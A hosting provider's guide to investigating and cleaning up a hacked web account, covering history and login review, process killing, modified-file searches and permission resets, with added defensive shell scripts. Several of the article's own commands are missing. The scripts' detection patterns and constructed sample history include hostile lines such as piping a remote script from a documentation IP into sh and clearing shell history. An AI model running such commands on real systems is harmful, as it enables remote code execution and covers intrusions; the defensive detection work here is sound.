Determining the cause
The first step to securing your web site and getting back to normal operation is determining how it was hacked. In general, most hacks occur for one of the following reasons:
- Your FTP/SSH password has been compromised.
- File permissions for files or directories in the public_html directory are too permissive.
- A software application installed on your web site contains a vulnerability, and an attacker is exploiting it to run arbitrary code on the server.
Looking for FTP/SSH password compromises
You should first try to determine if someone has compromised your password and logged in to your account. To do this, follow these steps:
- Log in to your account using SSH.
- At the command prompt, type the following command:
This command displays the last 1000 commands run on the account and, if history timestamps are enabled for the account, when each was run. Review the recent entries for any commands that seem suspicious or that you did not type. This method is not fool-proof: the command history can be cleared, edited, or forged by a malicious actor, and it only records commands typed into an interactive shell, not commands run through a web shell or a compromised application.
- At the command prompt, type the following command:
This command displays the IP address of the last user who logged in to your cPanel account. The same information is shown on the cPanel home page. Compare it with your own address; to see what your own IP address is, visit http://ipfinder.us. A login from an address you do not recognize means someone else has used your password.
- Change your account password in cPanel immediately, even if the previous steps turned up nothing suspicious. For information about how to do this, please see this article.
- Stop using FTP. Regular FTP transmits your password over the Internet in unencrypted plaintext, where it is easily intercepted. Use SFTP or SSH instead.
- Verify that you are running up-to-date virus and malware protection on any computers you have used to access your account. Malware on your own computer is a common way for FTP and SSH passwords to leak, and a new password typed on an infected machine will leak the same way, so clean the computer before you change the password.
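To make the history review less of an eyeball exercise, here is an added example (not from the original article) that greps a bash history file for command patterns that commonly appear after an account compromise: downloads piped straight into a shell, base64 decoding, chmod 777, netcat-style tools, crontab edits, attempts to clear or disable history, and scripts dropped under /tmp or /dev/shm. It also checks whether the history file itself has been emptied or redirected to /dev/null. The pattern list and the sample history are constructed for illustration; the default path ~/.bash_history assumes a bash login shell.

```shell
#!/bin/bash
# Added example, not part of the original article. Assumes a bash login shell
# whose history is kept in ~/.bash_history (no timestamps). The patterns are
# an illustrative heuristic for triage, not a complete indicator list.

# Print matching history lines, prefixed with their line number so they can be
# cross-referenced with the numbered output of the `history` command.
# Exit status: 0 whether or not anything matched; non-zero only if grep failed.
flag_suspicious_history() {
    histfile="${1:-$HOME/.bash_history}"
    grep -n -E \
        -e '(wget|curl)[^|]*\|[[:space:]]*(ba)?sh' \
        -e 'base64[[:space:]]+(-d|--decode)' \
        -e 'chmod[[:space:]]+(-R[[:space:]]+)?[0-7]?777' \
        -e '(^|[[:space:]])(nc|ncat|socat)[[:space:]]' \
        -e 'crontab[[:space:]]+-' \
        -e 'history[[:space:]]+-c|HISTFILE=|unset[[:space:]]+HISTFILE' \
        -e '/dev/shm/|/tmp/\.' \
        "$histfile" || [ $? -eq 1 ]
}

# Report signs that the history itself was tampered with: a file that has been
# emptied or removed, or one replaced by a symlink to /dev/null so that nothing
# further is recorded.
history_tamper_hints() {
    histfile="${1:-$HOME/.bash_history}"
    if [ -L "$histfile" ] && [ "$(readlink "$histfile")" = "/dev/null" ]; then
        echo "TAMPER: $histfile is a symlink to /dev/null"
    elif [ ! -s "$histfile" ]; then
        echo "TAMPER: $histfile is missing or empty"
    else
        echo "OK: $histfile has $(grep -c '' "$histfile") lines"
    fi
}

# Constructed sample history for demonstration (not a real capture; the
# 203.0.113.0/24 range is reserved for documentation).
sample=$(mktemp)
cat >"$sample" <<'EOF'
cd public_html
ls -la
nano wp-config.php
wget -q http://203.0.113.10/x.txt -O /tmp/.x.php
curl -s http://203.0.113.10/i.sh | sh
chmod 777 public_html/uploads
echo 'ZWNobyBoaQo=' | base64 -d
history -c
EOF
echo "== suspicious entries in constructed sample =="
flag_suspicious_history "$sample"
history_tamper_hints "$sample"
rm -f "$sample"
```

Run flag_suspicious_history with no argument on the account to scan the real ~/.bash_history; it only reads the file. Anything flagged still needs human judgement: a chmod 777 you ran yourself is not an intrusion, and an attacker who cleared the history leaves nothing to flag, which is why the tamper check matters.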
Looking for software vulnerabilities
Out-of-date software applications often contain well-known security vulnerabilities that malicious actors exploit using automated scripts. Software applications include anything you have installed using Softaculous, as well as any packages that you have installed manually. Usually these are applications such as blogs, image galleries, forums, shopping carts, content management systems, etc.

You should review all of the software applications that are installed on your web site. Make sure you have installed the most recent version and all updates. When you update software applications, check the plugins and themes as well: an up-to-date core with an abandoned plugin is still vulnerable. If you have any non-standard plugins installed with your applications, do a web search for the plugin name and the term "vulnerability" to see if there are any known issues with your version. If you discover any known vulnerabilities, either update the plugin or remove it; merely deactivating it leaves its files on the server, where they may still be reachable directly over the web.

You should also check for recent errors on your web site by using cPanel's Error Log feature. Error messages can help you determine which software applications or files are vulnerable, and the raw access logs (also available in cPanel) show which URLs were requested, which often pinpoints the script that was attacked and the address it was attacked from. After you have updated your software applications and plugins, go to the Cleaning up after a hack section below.

Cleaning up after a hack
After you have secured your web site, the next step is to clean up the mess left behind by the perpetrators and restore normal operation.

Stopping malicious processes
The first step in the cleanup process is to ensure that no malicious processes are still running on your account. Otherwise, you may go through all of the following cleanup steps only to have those processes re-infect your account as soon as you are done. To view the user processes running on your account, follow these steps:
- Log in to your account using SSH.
- At the command prompt, type the following command:
- Examine the list of running processes and look for anything suspicious: programs running from /tmp or /dev/shm, scripting interpreters (perl, python, php) running scripts you do not recognize, network tools you never installed, or anything that has been running since before you noticed the problem. If you see a suspicious process, note its process ID (PID) number.
Your own login shell and the ps command you ran in step 2 will appear in the list themselves; they are normal and should not be terminated. For example:
These two processes are normal.
- Kill any suspicious processes that you found. If a process reappears after you kill it, something is restarting it: check your cron jobs (crontab -l in SSH, or Cron Jobs in cPanel), remove any entries you did not create, and then kill the process again. To kill a process, type the following command for each one, replacing process_id with the process ID (PID) that you noted in step 3:
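An added example (not from the original article) that automates the review described above: it lists your processes in a parseable form, flags those whose command line points into a world-writable scratch directory (/tmp, /var/tmp, /dev/shm) or invokes a netcat-style tool, shows where a flagged PID's executable really lives via /proc, and terminates a PID cleanly, escalating to SIGKILL only if the process ignores SIGTERM. The heuristics and the sample ps lines are constructed for illustration; inspect_pid assumes a Linux /proc filesystem and list_my_processes assumes procps ps.

```shell
#!/bin/bash
# Added example, not part of the original article. Assumes a Linux host with
# procps `ps` and /proc (as on typical cPanel servers). The "suspicious"
# heuristics below are illustrative triage rules, not a complete list.

# Your own processes as "PID COMMAND LINE", no header, one per line.
list_my_processes() {
    ps -u "$(id -un)" -o pid=,args=
}

# Read "PID COMMAND LINE" on stdin and print the entries whose command runs
# from a world-writable scratch directory or is a raw network tool that no web
# application needs. Your login shell and the ps command itself never match.
flag_suspicious_processes() {
    while read -r pid cmd; do
        case "$cmd" in
            /tmp/*|/var/tmp/*|/dev/shm/*|*" /tmp/"*|*" /var/tmp/"*|*" /dev/shm/"*)
                echo "$pid $cmd" ;;
            nc\ *|ncat\ *|socat\ *|*/nc\ *|*/ncat\ *|*/socat\ *)
                echo "$pid $cmd" ;;
        esac
    done
}

# Where a process's binary and working directory really are. A "(deleted)"
# suffix on exe means the file was removed after the process started, which
# is common for dropped malware that cleans up after itself.
inspect_pid() {
    printf '%s exe=%s cwd=%s\n' "$1" \
        "$(readlink "/proc/$1/exe" 2>/dev/null || echo '?')" \
        "$(readlink "/proc/$1/cwd" 2>/dev/null || echo '?')"
}

# Ask the process to exit (SIGTERM); if it is still alive a second later,
# force it (SIGKILL). Returns 0 once the PID is gone.
terminate_pid() {
    kill "$1" 2>/dev/null || true
    sleep 1
    if kill -0 "$1" 2>/dev/null; then
        kill -9 "$1" 2>/dev/null || true
        sleep 1
    fi
    ! kill -0 "$1" 2>/dev/null
}

# Demonstration on constructed ps output (not a real capture).
echo "== flagged in constructed sample =="
printf '%s\n' \
    '4101 -bash' \
    '4155 ps -u user -o pid=,args=' \
    '4200 perl /tmp/.x/bot.pl' \
    '4211 /dev/shm/.k' \
    '4300 php-fpm: pool user' \
  | flag_suspicious_processes
# Live use on the account: list_my_processes | flag_suspicious_processes
```

Run inspect_pid on each flagged PID before killing it; a binary living under /tmp or already deleted is a strong sign it is not yours, whereas a flag on a process you recognize is a false positive from the simple pattern list.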
Removing hacked files
You should go through all of the files in your account and delete anything that you did not put there. If you are using an FTP client, make sure it is set to show hidden files. Similarly, if you are using the command line in SSH, make sure you use the -a option with the ls command so it shows all files. (Many malicious files try to "hide" from casual observation by making themselves hidden.)

Although we recommend going through all of your files, you can prioritize your search. Look first at file modification timestamps that have changed since you last modified your site, or that fall around the time the hack took place. If you identify a file that was modified during the hack (such as a defaced index page), you may be able to locate other affected files by searching for similar timestamps. Bear in mind that an attacker can back-date a file's modification time (the touch command does this), so an old-looking timestamp is not proof that a file is clean; the file's change time (ctime), which an ordinary user cannot set, is harder to forge. Where possible, compare files against a known-good backup or a fresh download of the same application version.

For example, to find all of the files that have been modified in your public_html directory within the last three days, follow these steps:
- Log in to your account using SSH.
- At the command prompt, type the following commands:
You can change the -3 option to control how many days back the find command searches for modified files. For example, to search back five days instead of three, use -5. Because hidden files are a favorite hiding place, note that find does include them: unlike ls, it needs no extra option to show files whose names begin with a dot.
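The following added example (not from the original article) wraps the timestamp search in small functions and demonstrates its main pitfall: an intruder can back-date a file's modification time with touch, so a search on mtime alone misses it, while the inode change time (ctime), which an unprivileged user cannot set, still reveals it. A third function finds files modified after a known-bad reference file such as a defaced index page. Only POSIX find options are used; the temporary directory and files in the demonstration are constructed.

```shell
#!/bin/bash
# Added example, not part of the original article. Uses only POSIX find
# primaries (-mtime, -ctime, -newer), so it runs on any Linux/BSD host.
# Hidden files are included automatically: find does not skip dotfiles.

# Regular files under DIR whose contents were modified within the last DAYS
# days (mtime). This is the timestamp an attacker can forge with `touch -t`.
modified_within_days() {
    find "$1" -type f -mtime "-$2"
}

# Regular files under DIR whose inode changed within the last DAYS days
# (ctime). Any write, rename, chmod, or even a forged `touch -t` updates
# ctime, and only root can set it, so a back-dated file still shows up here.
changed_within_days() {
    find "$1" -type f -ctime "-$2"
}

# Regular files under DIR modified after a known-bad reference file (for
# example a defaced index page), to sweep up the rest of the same intrusion.
modified_after() {
    find "$1" -type f -newer "$2"
}

# Demonstration: one fresh file and one whose mtime has been back-dated the
# way an intruder might (constructed in a temporary directory).
demo_dir=$(mktemp -d)
echo '<?php // legitimate' > "$demo_dir/index.php"
echo '<?php // dropped, then back-dated' > "$demo_dir/.cache.php"
touch -t 201501010000 "$demo_dir/.cache.php"
echo "-- mtime within 3 days (misses the back-dated file):"
modified_within_days "$demo_dir" 3
echo "-- ctime within 3 days (catches it):"
changed_within_days "$demo_dir" 3
rm -rf "$demo_dir"
```

On the account, run changed_within_days ~/public_html 3 alongside the mtime search; any file that appears only in the ctime list has had its timestamp tampered with and deserves a close look.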
Setting correct file permissions
By default, every directory beneath the public_html directory should have its permissions set to 755 (read, write, and execute for the owner; read and execute for everyone else), and every file should have its permissions set to 644 (read and write for the owner; read only for everyone else). Nothing under public_html should be world-writable (777 or 666): on a shared host, that lets other accounts write to your files. To set these permissions for your account, follow these steps:
- Log in to your account using SSH.
- At the command prompt, type the following commands:
After you make these changes, you may need to adjust permissions for a few individual files, depending on the applications you have installed; an application's installation documentation usually lists them. Nevertheless, it is good security practice to set secure permissions first and then make individual adjustments as necessary, rather than loosening everything to make an error disappear. Never answer a permission error with 777. Files that hold credentials, such as an application's database configuration file, can usually be tightened further (to 600 or 640) when PHP on your server runs as your own user; test the site after any change.
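Here is an added example (not from the original article) that applies the 755/644 baseline and then audits the tree, so you can see exactly what deviates before and after. Directories and files are handled separately because 755 on a file and 644 on a directory are both wrong, and symbolic links are left alone. The paths are whatever you pass in; the demonstration tree in the test is constructed.

```shell
#!/bin/bash
# Added example, not part of the original article. Assumes POSIX find and
# chmod on a Linux host; pass the directory you want to treat (for example
# ~/public_html). Symbolic links are skipped because -type d/-type f do not
# match them, so a link pointing outside your tree is never followed.

# Entries under DIR that deviate from the 755/644 baseline (empty output
# means the tree already complies). Run this first to see what will change.
audit_permissions() {
    find "$1" \( -type d ! -perm 755 \) -o \( -type f ! -perm 644 \)
}

# Entries under DIR that anyone on the host can write to. These are the most
# urgent to fix on shared hosting, whatever else you decide about the rest.
world_writable() {
    find "$1" -perm -002
}

# Apply the baseline: 755 on every directory, 644 on every regular file.
# `-exec ... {} +` batches paths into as few chmod invocations as possible.
apply_baseline_permissions() {
    find "$1" -type d -exec chmod 755 {} +
    find "$1" -type f -exec chmod 644 {} +
}

# Read-only usage: run this script with the directory as its only argument to
# list the deviations without changing anything, then call
# apply_baseline_permissions yourself once you have reviewed the list.
if [ -n "${1-}" ]; then
    echo "== world-writable under $1 =="
    world_writable "$1"
    echo "== deviating from 755/644 under $1 =="
    audit_permissions "$1"
fi
```

After apply_baseline_permissions, re-run audit_permissions: anything it still prints is either outside the baseline on purpose (a deliberately tightened config file) or a setuid/setgid bit that should not be there at all.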